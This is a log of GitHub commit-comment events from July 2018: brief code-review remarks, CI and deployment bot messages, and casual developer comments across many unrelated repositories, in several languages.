{"id":"7978423113","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29738898,"position":null,"line":null,"path":null,"commit_id":"e639b8a539d131e6027227dcd81e572e28c62805","created_at":"2018-07-17T18:16:23Z","updated_at":"2018-07-17T18:16:23Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [circleci2r](https://circleci2r-static-docs.pantheonsite.io/docs) Multidev environment:\n- [composer.lock](https://github.com/pantheon-systems/documentation/commit/e639b8a539d131e6027227dcd81e572e28c62805/composer.lock)\n"}},"created_at":"2018-07-17T18:16:23Z"}
{"id":"7978423174","type":"CommitCommentEvent","actor":{"login":"cmatejka"},"repo":{"name":"cmatejka/Work-Repo"},"payload":{"comment":{"id":29738899,"position":null,"line":null,"path":null,"commit_id":"cc7d21334bce7f43e842cb9405a0c45a9fe0de82","created_at":"2018-07-17T18:16:24Z","updated_at":"2018-07-17T18:16:24Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Test](https://trello.com/c/8cTeSXJt/2-test)"}},"created_at":"2018-07-17T18:16:24Z"}
{"id":"7978423577","type":"CommitCommentEvent","actor":{"login":"nickswalker"},"repo":{"name":"UTCS-Robotics-Camp/texas-robocamp.github.io"},"payload":{"comment":{"id":29738900,"position":null,"line":null,"path":null,"commit_id":"7789143971df6a8311759245353652a3128c6d22","created_at":"2018-07-17T18:16:28Z","updated_at":"2018-07-17T18:16:28Z","author_association":"MEMBER","body":"No need to track `_site`, it's just build output"}},"created_at":"2018-07-17T18:16:28Z"}
{"id":"7978425424","type":"CommitCommentEvent","actor":{"login":"lukaszkinder"},"repo":{"name":"TomaszKrzesinski/StarterKitChess"},"payload":{"comment":{"id":29738908,"position":null,"line":null,"path":null,"commit_id":"3ff3fcf4b6ad4f14d066abbb6afb74be4de1d952","created_at":"2018-07-17T18:16:48Z","updated_at":"2018-07-17T18:16:48Z","author_association":"NONE","body":"no tak ale pusty gitignore nic nie zmienia"}},"created_at":"2018-07-17T18:16:48Z"}
{"id":"7978427174","type":"CommitCommentEvent","actor":{"login":"Rexagon"},"repo":{"name":"Rexagon/moysklad-courier"},"payload":{"comment":{"id":29738915,"position":null,"line":null,"path":null,"commit_id":"d0e864947a903b22376bd2c55774516a92e5c772","created_at":"2018-07-17T18:17:09Z","updated_at":"2018-07-17T18:17:09Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [В карточке заказа добавить, чтобы учитывались переносы строк в поле \"Комментарий\".](https://trello.com/c/hMmh0oxP/11-%D0%B2-%D0%BA%D0%B0%D1%80%D1%82%D0%BE%D1%87%D0%BA%D0%B5-%D0%B7%D0%B0%D0%BA%D0%B0%D0%B7%D0%B0-%D0%B4%D0%BE%D0%B1%D0%B0%D0%B2%D0%B8%D1%82%D1%8C-%D1%87%D1%82%D0%BE%D0%B1%D1%8B-%D1%83%D1%87%D0%B8%D1%82%D1%8B%D0%B2%D0%B0%D0%BB%D0%B8%D1%81%D1%8C-%D0%BF%D0%B5%D1%80%D0%B5%D0%BD%D0%BE%D1%81%D1%8B-%D1%81%D1%82%D1%80%D0%BE%D0%BA-%D0%B2-%D0%BF%D0%BE%D0%BB%D0%B5-%D0%BA%D0%BE%D0%BC%D0%BC%D0%B5%D0%BD%D1%82%D0%B0%D1%80%D0%B8%D0%B9)"}},"created_at":"2018-07-17T18:17:09Z"}
{"id":"7978428787","type":"CommitCommentEvent","actor":{"login":"nickswalker"},"repo":{"name":"UTCS-Robotics-Camp/texas-robocamp.github.io"},"payload":{"comment":{"id":29738917,"position":null,"line":null,"path":null,"commit_id":"ec5ed1bbf7287d7d5484618bc2c3442eeecf2a2b","created_at":"2018-07-17T18:17:26Z","updated_at":"2018-07-17T18:17:26Z","author_association":"MEMBER","body":"Don't track changes to `_site`. That directory is generated output. Only track changes to markdown files."}},"created_at":"2018-07-17T18:17:26Z"}
{"id":"7978429698","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"Evgeny1973/gb-yii.local"},"payload":{"comment":{"id":29738919,"position":19,"line":19,"path":"commands/UserLogController.php","commit_id":"23415120c3415a526a4f52d9978be9eba6a33908","created_at":"2018-07-17T18:17:37Z","updated_at":"2018-07-17T18:17:37Z","author_association":"NONE","body":"по PSR скобку принято переносить на новую строку. \r\nпочему именно PSR? Да, просто стандарт. Стандартизированный код легко читать и понимать)"}},"created_at":"2018-07-17T18:17:37Z"}
{"id":"7978430187","type":"CommitCommentEvent","actor":{"login":"samueltardieu"},"repo":{"name":"samueltardieu/pathfinding"},"payload":{"comment":{"id":29738921,"position":null,"line":null,"path":null,"commit_id":"4c4f97fdd464ed4a186e22b31c8de845693daf35","created_at":"2018-07-17T18:17:42Z","updated_at":"2018-07-17T18:17:42Z","author_association":"OWNER","body":"The wording is better, but please just use \"IDDFS\" as the entry name in the list, not the expanded name. Just like this is done for \"IDA*\" for example."}},"created_at":"2018-07-17T18:17:42Z"}
{"id":"7978432979","type":"CommitCommentEvent","actor":{"login":"lukaszkinder"},"repo":{"name":"TomaszKrzesinski/StarterKitChess"},"payload":{"comment":{"id":29738928,"position":99,"line":331,"path":"ChessAlgorithms/src/main/java/com/capgemini/chess/algorithms/implementation/BoardManager.java","commit_id":"f358cff91ecd862bb374b242e192a89fc5187232","created_at":"2018-07-17T18:18:13Z","updated_at":"2018-07-17T18:18:13Z","author_association":"NONE","body":"przenieś do właściwej klasy"}},"created_at":"2018-07-17T18:18:13Z"}
{"id":"7978434799","type":"CommitCommentEvent","actor":{"login":"lukaszkinder"},"repo":{"name":"TomaszKrzesinski/StarterKitChess"},"payload":{"comment":{"id":29738930,"position":81,"line":313,"path":"ChessAlgorithms/src/main/java/com/capgemini/chess/algorithms/implementation/BoardManager.java","commit_id":"f358cff91ecd862bb374b242e192a89fc5187232","created_at":"2018-07-17T18:18:33Z","updated_at":"2018-07-17T18:18:33Z","author_association":"NONE","body":"przenieś do właściwej klasy"}},"created_at":"2018-07-17T18:18:33Z"}
{"id":"7978440782","type":"CommitCommentEvent","actor":{"login":"Doka-NT"},"repo":{"name":"Evgeny1973/gb-yii.local"},"payload":{"comment":{"id":29738945,"position":29,"line":126,"path":"yii2.sql","commit_id":"89cdab41a186b6c7b46c6bf192ec5e68f1aec412","created_at":"2018-07-17T18:19:41Z","updated_at":"2018-07-17T18:19:41Z","author_association":"NONE","body":"Когда используешь миграции, надобность в sql файлах практически отпадает. Только если данные для инициализации хранить. Вся структура уже итак хранится в миграциях)"}},"created_at":"2018-07-17T18:19:41Z"}
{"id":"7978442189","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"mazureq/Pawel-Mazurkiewicz-Kodilla-java"},"payload":{"comment":{"id":29738948,"position":13,"line":13,"path":"kodilla-good-patterns/src/main/java/com/kodilla/good/patterns/challenges/Game.java","commit_id":"28abf39afacd7ffd526e14238af59396f25e413f","created_at":"2018-07-17T18:19:57Z","updated_at":"2018-07-17T18:19:57Z","author_association":"NONE","body":"Czemu zwracany jest null?"}},"created_at":"2018-07-17T18:19:57Z"}
{"id":"7978443029","type":"CommitCommentEvent","actor":{"login":"shilpa24balaji"},"repo":{"name":"sadhyama/xmidt"},"payload":{"comment":{"id":29738952,"position":4,"line":145,"path":"README.md","commit_id":"053180f0f96e3b8afbc4c391092b303c7157396a","created_at":"2018-07-17T18:20:07Z","updated_at":"2018-07-17T18:20:07Z","author_association":"NONE","body":"Move this README to src/CRUD not in the main repo."}},"created_at":"2018-07-17T18:20:07Z"}
{"id":"7978444620","type":"CommitCommentEvent","actor":{"login":"pingevt"},"repo":{"name":"bluecadet/d8train"},"payload":{"comment":{"id":29738958,"position":null,"line":null,"path":null,"commit_id":"04c0b9fb4cb387126671b6ded978cacbab616821","created_at":"2018-07-17T18:20:24Z","updated_at":"2018-07-17T18:20:24Z","author_association":"MEMBER","body":"[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-8-d8train.pantheonsite.io/)\n\nCreated multidev environment [pr-8](https://dashboard.pantheon.io/sites/87e352d4-b22d-49b9-92d4-3fdda5d30ad2#pr-8) for d8train."}},"created_at":"2018-07-17T18:20:24Z"}
{"id":"7978446505","type":"CommitCommentEvent","actor":{"login":"jperelli"},"repo":{"name":"cualbondi/poller"},"payload":{"comment":{"id":29738960,"position":null,"line":null,"path":null,"commit_id":"592b7229ac6004b0bf0cff9aa1f23bea1e21e6f2","created_at":"2018-07-17T18:20:46Z","updated_at":"2018-07-17T18:20:46Z","author_association":"MEMBER","body":"@marcosfede genio!"}},"created_at":"2018-07-17T18:20:46Z"}
{"id":"7978447582","type":"CommitCommentEvent","actor":{"login":"bbdaiya"},"repo":{"name":"shivam-munchi/newsApp"},"payload":{"comment":{"id":29738963,"position":7,"line":7,"path":"app/src/main/res/layout/news_item.xml","commit_id":"edd7adb61705cbfb31a6414ecc3f751c312cf6d1","created_at":"2018-07-17T18:20:59Z","updated_at":"2018-07-17T18:20:59Z","author_association":"NONE","body":"Checkout cardview"}},"created_at":"2018-07-17T18:20:59Z"}
{"id":"7978449278","type":"CommitCommentEvent","actor":{"login":"eximchain137"},"repo":{"name":"eximchain137/terraform-aws-eximchain-node"},"payload":{"comment":{"id":29738966,"position":null,"line":null,"path":null,"commit_id":"6b0f497fe366a1a50a4dc83b8f39ca26fe2f3dfd","created_at":"2018-07-17T18:21:18Z","updated_at":"2018-07-17T18:21:18Z","author_association":"OWNER","body":"NOT SECURE, NOT FOR PRODUCTION"}},"created_at":"2018-07-17T18:21:18Z"}
{"id":"7978449826","type":"CommitCommentEvent","actor":{"login":"capitains-hook"},"repo":{"name":"PerseusDL/canonical-greekLit"},"payload":{"comment":{"id":29738969,"position":null,"line":null,"path":null,"commit_id":"9093197fec047907d227d521231b3e1aa37a5d92","created_at":"2018-07-17T18:21:24Z","updated_at":"2018-07-17T18:21:24Z","author_association":"NONE","body":"## Global\n\n| Changed            |   Status |\n|:-------------------|---------:|\n| `coverage`         |      0.1 |\n| `metadata_passing` |      2   |\n| `metadata_total`   |      2   |\n| `nodes_count`      |     59   |\n| `texts_total`      |      2   |\n\n## Words\n\n| Changed   |   Status |\n|:----------|---------:|\n| `grc`     |   +15534 |\n\n## Units\n\n| Changed                                                     | Status   |\n|:------------------------------------------------------------|:---------|\n| `./data/tlg0638/__cts__.xml`                                | New      |\n| `./data/tlg0638/tlg007/__cts__.xml`                         | New      |\n| `./data/tlg0638/tlg007/tlg0638.tlg007.perseus-grc2.xml`     | New      |\n| `./data/tlg0638/tlg007/tlg0638.tlg007.perseus-grc2_old.xml` | New      |\n| `./data/tlg0638/__cts__.xml`                                | Passing  |\n| `./data/tlg0638/tlg007/__cts__.xml`                         | Passing  |\n| `./data/tlg0638/tlg007/tlg0638.tlg007.perseus-grc2.xml`     | Failing  |\n| `./data/tlg0638/tlg007/tlg0638.tlg007.perseus-grc2_old.xml` | Failing  |\n\n*[Hook UI build recap](http://ci.perseids.org/repo/PerseusDL/canonical-greekLit/4460)*\n"}},"created_at":"2018-07-17T18:21:24Z"}
{"id":"7978451075","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29738974,"position":null,"line":null,"path":null,"commit_id":"5c08715927407b6e451003864b3f89b1f8fff858","created_at":"2018-07-17T18:21:39Z","updated_at":"2018-07-17T18:21:39Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [circleci2r](https://circleci2r-static-docs.pantheonsite.io/docs) Multidev environment:\n- [composer.lock](https://github.com/pantheon-systems/documentation/commit/e639b8a539d131e6027227dcd81e572e28c62805/composer.lock)\n- [scripts/deploy-live.sh](https://github.com/pantheon-systems/documentation/commit/5c08715927407b6e451003864b3f89b1f8fff858/scripts/deploy-live.sh)\n"}},"created_at":"2018-07-17T18:21:39Z"}
{"id":"7978455457","type":"CommitCommentEvent","actor":{"login":"shilpa24balaji"},"repo":{"name":"sadhyama/xmidt"},"payload":{"comment":{"id":29738984,"position":29,"line":29,"path":"src/CRUD/CRUD.go","commit_id":"053180f0f96e3b8afbc4c391092b303c7157396a","created_at":"2018-07-17T18:22:27Z","updated_at":"2018-07-17T18:22:27Z","author_association":"NONE","body":"Define header names as constants"}},"created_at":"2018-07-17T18:22:27Z"}
{"id":"7978456188","type":"CommitCommentEvent","actor":{"login":"birdbrained"},"repo":{"name":"birdbrained/waterbutler"},"payload":{"comment":{"id":29738988,"position":9,"line":10,"path":"waterbutler/providers/dropbox/provider.py","commit_id":"ee94e74c8c3a134bcecab463fda104793157a34b","created_at":"2018-07-17T18:22:36Z","updated_at":"2018-07-17T18:22:36Z","author_association":"OWNER","body":"I think it might be nice to import the exceptions and settings explicitly."}},"created_at":"2018-07-17T18:22:36Z"}
{"id":"7978456525","type":"CommitCommentEvent","actor":{"login":"Vitoshka"},"repo":{"name":"ElvUI-WotLK/ElvUI"},"payload":{"comment":{"id":29738989,"position":null,"line":null,"path":null,"commit_id":"90f75d2c917e52514837bebda38c77658d8d1ea3","created_at":"2018-07-17T18:22:40Z","updated_at":"2018-07-17T18:22:40Z","author_association":"NONE","body":"ElvUI_Config/locales/russian_config.lua\r\n+L[\"Use the Name Color of the unit for the Name Glow.\"] = \"Испол**д**ьзовать цвет имени юнита для свечения имени.\"\r\n**grammatical error in the word**"}},"created_at":"2018-07-17T18:22:40Z"}
{"id":"7978456670","type":"CommitCommentEvent","actor":{"login":"sopwerdna"},"repo":{"name":"tommy-and-leo/ceph"},"payload":{"comment":{"id":29738990,"position":89,"line":133,"path":"src/librbd/cache/PrefetchImageCache.cc","commit_id":"e2056f97634f21345939a9766db53159f1a8a166","created_at":"2018-07-17T18:22:42Z","updated_at":"2018-07-17T18:22:42Z","author_association":"COLLABORATOR","body":"i'm not clear on what you're going for here, but this is a potential major problem because you're doing this after you send the read request to the cluster with the imagewriteback's aio_read. that's a potential race condition, because you don't know when the cluster will respond or how long it will take and therefore you don't know whether this chunk of code will execute before or after bl has been modified by stuff lower down in the stack."}},"created_at":"2018-07-17T18:22:42Z"}
{"id":"7978457472","type":"CommitCommentEvent","actor":{"login":"shilpa24balaji"},"repo":{"name":"sadhyama/xmidt"},"payload":{"comment":{"id":29738992,"position":35,"line":35,"path":"src/CRUD/CRUD.go","commit_id":"053180f0f96e3b8afbc4c391092b303c7157396a","created_at":"2018-07-17T18:22:52Z","updated_at":"2018-07-17T18:22:52Z","author_association":"NONE","body":"Define URL also as a constant"}},"created_at":"2018-07-17T18:22:52Z"}
{"id":"7978458431","type":"CommitCommentEvent","actor":{"login":"skorasaurus"},"repo":{"name":"opencleveland/large-lots"},"payload":{"comment":{"id":29738995,"position":null,"line":null,"path":null,"commit_id":"ce32c8bbc65e58cc725ee39f0c6fad3e285f40b9","created_at":"2018-07-17T18:23:04Z","updated_at":"2018-07-17T18:23:04Z","author_association":"MEMBER","body":"thanks; I'll deploy this on the server. \r\n"}},"created_at":"2018-07-17T18:23:04Z"}
{"id":"7978460255","type":"CommitCommentEvent","actor":{"login":"joshuaogle"},"repo":{"name":"johncowen/iris"},"payload":{"comment":{"id":29738997,"position":184,"line":104,"path":"color/base-variables.css","commit_id":"b6dcf8a00a91356e4fe72288c912a43a35ff8858","created_at":"2018-07-17T18:23:23Z","updated_at":"2018-07-17T18:23:23Z","author_association":"NONE","body":"Since our UI Blue is directly based on the brand blue, would it be better to use those variables here instead of hex?\r\n\r\nActually, further along those lines, what do you think about leaving these colors without a prefix (or maybe with `--color-`as the prefix), and then pulling out the semantic names like `--color-action: --color-blue-500;` and `--color-success: --color-green-500;`?\r\n\r\nI just redid the color organization in a similar way in the Sketch file: \r\n![image](https://user-images.githubusercontent.com/111194/42837755-297598e8-89bc-11e8-9678-d3365092e982.png)\r\n\r\n![image](https://user-images.githubusercontent.com/111194/42837763-2e1a84f8-89bc-11e8-8886-73b0ca1b861a.png)\r\n"}},"created_at":"2018-07-17T18:23:23Z"}
{"id":"7978460820","type":"CommitCommentEvent","actor":{"login":"101208"},"repo":{"name":"SupplyFrame/hackaday-belgrade"},"payload":{"comment":{"id":29738998,"position":null,"line":null,"path":null,"commit_id":"6b3d91099c541fb08f5c430271ed56fc5ecdd05b","created_at":"2018-07-17T18:23:30Z","updated_at":"2018-07-17T18:23:30Z","author_association":"NONE","body":"How to code in my dialogue box "}},"created_at":"2018-07-17T18:23:30Z"}
{"id":"7978462695","type":"CommitCommentEvent","actor":{"login":"joshuaogle"},"repo":{"name":"johncowen/iris"},"payload":{"comment":{"id":29739000,"position":12,"line":9,"path":"bin/sassify","commit_id":"b6dcf8a00a91356e4fe72288c912a43a35ff8858","created_at":"2018-07-17T18:23:52Z","updated_at":"2018-07-17T18:23:52Z","author_association":"NONE","body":"This is so cool ❤️ "}},"created_at":"2018-07-17T18:23:52Z"}
{"id":"7978464584","type":"CommitCommentEvent","actor":{"login":"lukaszkinder"},"repo":{"name":"TomaszKrzesinski/StarterKitChess"},"payload":{"comment":{"id":29739010,"position":null,"line":null,"path":null,"commit_id":"f358cff91ecd862bb374b242e192a89fc5187232","created_at":"2018-07-17T18:24:14Z","updated_at":"2018-07-17T18:24:14Z","author_association":"NONE","body":"uwagi ogólne:\r\nużywaj składni\r\n  @Test(expected = ...Exception.class)\r\n\r\nzamiast porównywać message z exceptionów\r\n\r\nW testach jednostkowych dla MoveValidator testuj MoveValidator  a nie BoardManager!"}},"created_at":"2018-07-17T18:24:14Z"}
{"id":"7978465213","type":"CommitCommentEvent","actor":{"login":"lwander"},"repo":{"name":"posox/clouddriver"},"payload":{"comment":{"id":29739013,"position":13,"line":37,"path":"clouddriver-kubernetes/src/main/groovy/com/netflix/spinnaker/clouddriver/kubernetes/v2/caching/view/model/KubernetesV2Cluster.java","commit_id":"af724c1596881766f2b6c14f42cd242760541f3e","created_at":"2018-07-17T18:24:22Z","updated_at":"2018-07-17T18:24:22Z","author_association":"NONE","body":"The name should stay \"kubernetes\" since this is an assumption baked into\nthe code other places\n\nOn Tue, Jul 17, 2018, 9:44 AM Sergey Reshetnyak <notifications@github.com>\nwrote:\n\n> Yes, we should use kubernetes.v2, but then we should change providerID to\n> kubernetes.v2.\n>\n> Some code in Orca compares cloudProviderId and cluster type. They should\n> be the same.\n>\n> @lwander <https://github.com/lwander> @ethanfrogers\n> <https://github.com/ethanfrogers> what do you think about changing\n> providerID?\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/posox/clouddriver/commit/af724c1596881766f2b6c14f42cd242760541f3e#commitcomment-29737812>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AEpivfHEI2_-CqY-Lp_qA2q_pJLWoQoJks5uHhRTgaJpZM4VTK_f>\n> .\n>\n"}},"created_at":"2018-07-17T18:24:22Z"}
{"id":"7978465398","type":"CommitCommentEvent","actor":{"login":"Robbie1977"},"repo":{"name":"openworm/org.geppetto.frontend"},"payload":{"comment":{"id":29739016,"position":null,"line":null,"path":null,"commit_id":"67aaa177770795e6a7958558f34b7ba019d7378f","created_at":"2018-07-17T18:24:24Z","updated_at":"2018-07-17T18:24:24Z","author_association":"CONTRIBUTOR","body":"@tarelli this commit wiped gpt-shapeshow when adding new icons:\r\nbefore:\r\n![image](https://user-images.githubusercontent.com/4630768/42837789-f1f7b0f0-89f6-11e8-8857-c6b93afa58fc.png)\r\nafter:\r\n![image](https://user-images.githubusercontent.com/4630768/42837800-f9666304-89f6-11e8-82cd-557b9558a22b.png)\r\nRef https://github.com/VirtualFlyBrain/geppetto-vfb/issues/220"}},"created_at":"2018-07-17T18:24:24Z"}
{"id":"7978491231","type":"CommitCommentEvent","actor":{"login":"ripplelabs-jenkins"},"repo":{"name":"mellery451/rippled"},"payload":{"comment":{"id":29739085,"position":null,"line":null,"path":null,"commit_id":"c49ad06fd06c480ca5a472a0321dcd90c513a586","created_at":"2018-07-17T18:29:25Z","updated_at":"2018-07-17T18:29:25Z","author_association":"COLLABORATOR","body":"\n## Jenkins Build Summary\n\nBuilt from [this commit](https://github.com/mellery451/rippled/commit/c49ad06fd06c480ca5a472a0321dcd90c513a586)\n\nBuilt at __20180717 - 18:29:24__\n\n### Test Results\n\nBuild Type | Log | Result | Status\n---------- | --- | ------ | ------\nrpm | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/develop-next/9//artifact/rpm.txt) | 1034 cases, 0 failed, t: n/a | PASS :white_check_mark: \nmsvc.Debug | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/develop-next/9//artifact/msvc.Debug.txt) | 1031 cases, 0 failed, t: 525s | PASS :white_check_mark: \nmsvc.Debug, <br/>NINJA_BUILD=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/develop-next/9//artifact/msvc.Debug_NINJA_BUILD_true.txt) | 1031 cases, 0 failed, t: 542s | PASS :white_check_mark: \nmsvc.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/develop-next/9//artifact/msvc.Debug_Dunity_OFF.txt) | 1027 cases, 0 failed, t: 1148s | PASS :white_check_mark: \nmsvc.Release | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/develop-next/9//artifact/msvc.Release.txt) | 1031 cases, 0 failed, t: 386s | PASS :white_check_mark: \ngcc.Release <br/>-Dassert=ON, <br/>MANUAL_TESTS=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/develop-next/9//artifact/gcc.Release_Dassert_ON_MANUAL_TESTS_true.txt) | 1101 cases, 0 failed, t: 920s | PASS :white_check_mark: \ndocs | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/develop-next/9//artifact/docs.txt) | 1 cases, 0 failed, t: 2s | PASS :white_check_mark: \nclang.Debug | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/develop-next/9//artifact/clang.Debug.txt) | 1034 cases, 0 failed, t: 276s | PASS :white_check_mark: \ngcc.Debug <br/>-Dcoverage=ON | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/develop-next/9//artifact/gcc.Debug_Dcoverage_ON.txt) | 1034 cases, 0 failed, t: 845s | PASS :white_check_mark: \ngcc.Debug | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/develop-next/9//artifact/gcc.Debug.txt) | 1034 cases, 0 failed, t: 288s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/develop-next/9//artifact/clang.Debug_Dunity_OFF.txt) | 1030 cases, 0 failed, t: 722s | PASS :white_check_mark: \ngcc.Debug <br/>-Dunity=OFF | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/develop-next/9//artifact/gcc.Debug_Dunity_OFF.txt) | 1030 cases, 0 failed, t: 708s | PASS :white_check_mark: \nclang.Release <br/>-Dassert=ON | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/develop-next/9//artifact/clang.Release_Dassert_ON.txt) | 1034 cases, 0 failed, t: 399s | PASS :white_check_mark: \ngcc.Debug <br/>-Dstatic=OFF | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/develop-next/9//artifact/gcc.Debug_Dstatic_OFF.txt) | 1034 cases, 0 failed, t: 289s | PASS :white_check_mark: \ngcc.Release <br/>-Dassert=ON | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/develop-next/9//artifact/gcc.Release_Dassert_ON.txt) | 1034 cases, 0 failed, t: 423s | PASS :white_check_mark: \ngcc.Debug <br/>-Dstatic=OFF -DBUILD_SHARED_LIBS=ON | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/develop-next/9//artifact/gcc.Debug_Dstatic_OFF_DBUILD_SHARED_LIBS_ON.txt) | 1034 cases, 0 failed, t: 290s | PASS :white_check_mark: \ngcc.Debug, <br/>NINJA_BUILD=true | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/develop-next/9//artifact/gcc.Debug_NINJA_BUILD_true.txt) | 1034 cases, 0 failed, t: 263s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF -Dsan=address, <br/>PARALLEL_TESTS=false, <br/>DEBUGGER=false | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/develop-next/9//artifact/clang.Debug_Dunity_OFF_Dsan_address_PARALLEL_TESTS_false_DEBUGGER_false.txt) | 1030 cases, 0 failed, t: 1051s | PASS :white_check_mark: \nclang.Debug <br/>-Dunity=OFF -Dsan=undefined, <br/>PARALLEL_TESTS=false | [logfile](http://ci.ops.ripple.com/job/mellery-rippled/job/develop-next/9//artifact/clang.Debug_Dunity_OFF_Dsan_undefined_PARALLEL_TESTS_false.txt) | 1030 cases, 0 failed, t: 1162s | PASS :white_check_mark: \n\n"}},"created_at":"2018-07-17T18:29:25Z"}
{"id":"7978492184","type":"CommitCommentEvent","actor":{"login":"asad6131"},"repo":{"name":"asad6131/task11"},"payload":{"comment":{"id":29739087,"position":null,"line":null,"path":null,"commit_id":"ae0c17260d4903b7bd3509fecc71b81409882048","created_at":"2018-07-17T18:29:36Z","updated_at":"2018-07-17T18:29:36Z","author_association":"OWNER","body":"npm used"}},"created_at":"2018-07-17T18:29:36Z"}
{"id":"7978493072","type":"CommitCommentEvent","actor":{"login":"mtourangeau"},"repo":{"name":"commaai/openpilot"},"payload":{"comment":{"id":29739091,"position":null,"line":null,"path":null,"commit_id":"19812e0b16f08ccc8f5bf1798862a96cbedbd6c5","created_at":"2018-07-17T18:29:45Z","updated_at":"2018-07-17T18:29:45Z","author_association":"NONE","body":"Do you think this can be ported to Prius Prime?"}},"created_at":"2018-07-17T18:29:45Z"}
{"id":"7978498970","type":"CommitCommentEvent","actor":{"login":"drazisil"},"repo":{"name":"Cryptix23/node-p2pool"},"payload":{"comment":{"id":29739111,"position":null,"line":null,"path":null,"commit_id":"77a2193b69ed0794342c8fc18c414e2e34c4262c","created_at":"2018-07-17T18:30:51Z","updated_at":"2018-07-17T18:30:51Z","author_association":"NONE","body":"I no longer use p2pool so no. Thank you for asking."}},"created_at":"2018-07-17T18:30:51Z"}
{"id":"7978500958","type":"CommitCommentEvent","actor":{"login":"kylebrandt"},"repo":{"name":"bosun-monitor/bosun"},"payload":{"comment":{"id":29739118,"position":null,"line":null,"path":null,"commit_id":"dc7ae64084e6caeeb9c4b295c15501314e349fb3","created_at":"2018-07-17T18:31:14Z","updated_at":"2018-07-17T18:31:14Z","author_association":"MEMBER","body":"I think it is ... maybe possible there are a one or two new issues from this change:\r\n - When something is squelched we get unknowns for it still (maybe already existing?)\r\n - I think I have seen repeated unknown notifications before something has been closed. Maybe this alters the \"only notify on increase of severity in the *lifetime* of the incident. "}},"created_at":"2018-07-17T18:31:14Z"}
{"id":"7978503721","type":"CommitCommentEvent","actor":{"login":"LTLA"},"repo":{"name":"drisso/SingleCellExperiment"},"payload":{"comment":{"id":29739130,"position":null,"line":null,"path":null,"commit_id":"a2dbb95c975277d39f423f4cdd15343affacc560","created_at":"2018-07-17T18:31:46Z","updated_at":"2018-07-17T18:31:46Z","author_association":"COLLABORATOR","body":"You know, I wonder whether we should just direct people to the BioC landing page, which would avoid us having to change these instructions in the future. "}},"created_at":"2018-07-17T18:31:46Z"}
{"id":"7978504079","type":"CommitCommentEvent","actor":{"login":"BBYBINO"},"repo":{"name":"rappahannockit/SolarWinds-RMM"},"payload":{"comment":{"id":29739131,"position":null,"line":null,"path":null,"commit_id":"fc11d29e60712d0f7ec07903d0013c461634648b","created_at":"2018-07-17T18:31:51Z","updated_at":"2018-07-17T18:31:51Z","author_association":"MEMBER","body":"😎 very nice"}},"created_at":"2018-07-17T18:31:51Z"}
{"id":"7978507531","type":"CommitCommentEvent","actor":{"login":"vovapasko"},"repo":{"name":"vovapasko/Crypto_fuignya"},"payload":{"comment":{"id":29739138,"position":73,"line":73,"path":"DBConnector.py","commit_id":"0446ba6795144496cfb0f081e7009883eba7c6a1","created_at":"2018-07-17T18:32:31Z","updated_at":"2018-07-17T18:32:31Z","author_association":"OWNER","body":"Я так понимаю вот здесь начинается вся \"непонятная фигня\"?\r\n"}},"created_at":"2018-07-17T18:32:31Z"}
{"id":"7978509055","type":"CommitCommentEvent","actor":{"login":"narspt"},"repo":{"name":"juribeparada/MMDVM_HS"},"payload":{"comment":{"id":29739142,"position":null,"line":null,"path":null,"commit_id":"46ba5cc4f74d072aa545fd54fc5b64bb473e65bd","created_at":"2018-07-17T18:32:49Z","updated_at":"2018-07-17T18:32:49Z","author_association":"NONE","body":"Mine is single PCB from DB9MAT/DF2ET, rev 1.2 (I wonder if the 3.3v DC filtering added on rev 1.4 improves that?) and yes I did test on other frequencies, RSSI measured on mmdvmcal is similar on whole band, actually some specific frequencies I tried are even worst with -95dbm and so... also I had care to monitor the hotspot frequency with a real radio to check for possible interference and found nothing wrong.\r\n\r\nJust for curiosity what noise floor you have or you use to see on a single PCB HS like mine?"}},"created_at":"2018-07-17T18:32:49Z"}
{"id":"7978510942","type":"CommitCommentEvent","actor":{"login":"drisso"},"repo":{"name":"drisso/SingleCellExperiment"},"payload":{"comment":{"id":29739153,"position":null,"line":null,"path":null,"commit_id":"a2dbb95c975277d39f423f4cdd15343affacc560","created_at":"2018-07-17T18:33:12Z","updated_at":"2018-07-17T18:33:12Z","author_association":"OWNER","body":"Yeah, that might be a good idea... remind me why we have such a long readme file and we don't simply refer to the vignette?"}},"created_at":"2018-07-17T18:33:12Z"}
